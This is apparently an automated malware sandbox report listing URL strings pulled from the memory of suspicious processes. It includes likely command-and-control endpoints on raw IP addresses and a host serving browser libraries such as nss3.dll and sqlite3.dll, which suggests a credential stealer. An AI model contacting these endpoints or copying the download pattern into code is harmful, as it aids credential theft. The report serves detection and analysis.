Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpcbW
Source: explorti.exe, 00000013.00000002.3258303084.0000000001648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpft
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phptch
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpwb
Source: explorti.exe, 00000013.00000002.3258303084.0000000001648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpx
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ferences.SourceAumid1
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/lfons
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ons
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ows
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp, 624f4d727e.exe, 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000014.00000002.2764922026.000000000250E000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31
Source: 624f4d727e.exe, 00000018.00000002.2899807297.0000000002621000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/
Source: 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/%TZS
Source: file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/2
Source: file.exe, 00000000.00000002.2380791496.000000000046A000.00000040.00000001.01000000.00000003.sdmp, 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.0000000002621000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php#O%S
Source: 624f4d727e.exe, 00000014.00000002.2765136724.0000000002587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php1
Source: 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php6O
Source: 624f4d727e.exe, 00000018.00000002.2899807297.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php;
Source: 624f4d727e.exe, 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php=uO6
Source: 624f4d727e.exe, 00000014.00000002.2765136724.0000000002587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpA
Source: file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpL
Source: file.exe, 00000000.00000002.2396165975.0000000028D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpM
Source: file.exe, 00000000.00000002.2396165975.0000000028D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpN
Source: file.exe, 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpkZT
Source: file.exe, 00000000.00000002.2380791496.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2396165975.0000000028D72000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpr
Source: 624f4d727e.exe, 00000018.00000002.2899807297.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpt
Source: 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpvWn
Source: 624f4d727e.exe, 00000014.00000002.2765136724.0000000002587000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpx
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dllD
Source: file.exe, 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll/
Source: file.exe, 00000000.00000002.2380791496.000000000046A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dllRZT
Source: 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/?
Source: 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/AppData
Source: file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/J
Source: 624f4d727e.exe, 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/SSC:
Source: 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/cal
Source: 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/e
Source: 624f4d727e.exe, 00000018.00000002.2899807297.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/g
Source: 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/o
Source: 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/w
Source: file.exe, 00000000.00000002.2380791496.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.315TJS
Source: 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31i
Source: 624f4d727e.exe, 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31lfC
Source: 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31lyF
Source: firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://win.ma
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 0000001E.00000002.3071808582.00000270DB742000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3100479236.00000270E2312000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 0000001E.00000002.3097214328.00000270E2132000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_REQUEST_BODY_SENT_startDetection/urlF
Source: firefox.exe, 0000001E.00000003.2998160641.00000270E41EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001E.00000003.2998160641.00000270E41EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001E.00000002.3032836106.00000270D618A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001E.00000002.3032836106.00000270D618A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001E.00000002.3032836106.00000270D618A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001E.00000002.3105353259.00000270E4012000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3071145346.00000270DB5D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105353259.00000270E4024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3104091280.00000270E3FF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3085513675.00000270DDAF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7CFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3104091280.00000270E3FD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974682541.00000270DB6EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3009455777.00000270E4061000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB0C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2975074362.00000270DB6CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3080838293.00000270DC8CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3085513675.00000270DDAAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3080838293.00000270DC87E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3020902581.00000270DC805000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3055070997.00000270DA603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2985790168.00000270E440E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3071509681.00000270DB6EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 00000017.00000000.2762168634.0000000000B81000.00000080.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000000.2937508935.0000000000B81000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 00000017.00000000.2762168634.0000000000B81000.00000080.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000000.2937508935.0000000000B81000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 00000017.00000000.2762168634.0000000000B81000.00000080.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000000.2937508935.0000000000B81000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-ocsp.symauth.com0
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001E.00000002.3085513675.00000270DDAAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4075000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001E.00000002.3085513675.00000270DDAAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105629754.00000270E4075000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: file.exe, file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatePREF_APP_UPDATE_BACKGROUNDMAXERRORSapp.update.checkOnlyInstanc
Source: firefox.exe, 0000001E.00000002.3108461657.00000270E4380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 0000001E.00000002.3081525186.00000270DC960000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC78F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3081525186.00000270DC903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3077664321.00000270DC668000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3047918500.00000270D8B83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3058796603.00000270DA903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3058796603.00000270DA956000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3058796603.00000270DA971000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067377430.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D9A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3081525186.00000270DC991000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001E.00000002.3081525186.00000270DC960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul5G
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/parent/ext-chr
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/schemas/ide
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/browse
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulconnectedCallback/this._mutationObserve
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/DownloadIntegrat
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2401548515.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4075000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2247000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DAD33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4075000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2247000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DAD33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001E.00000003.2966388903.00000270DA66B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965350403.00000270DA400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965635133.00000270DA61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3100479236.00000270E2312000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/INHIBIT_PERSISTENT_CACHINGLOAD_ANONYMOUS_ALLOW_CLIENT_CERTget
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.cagetLocalizedFragment/partIndex
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E40C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001E.00000002.3047918500.00000270D8B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
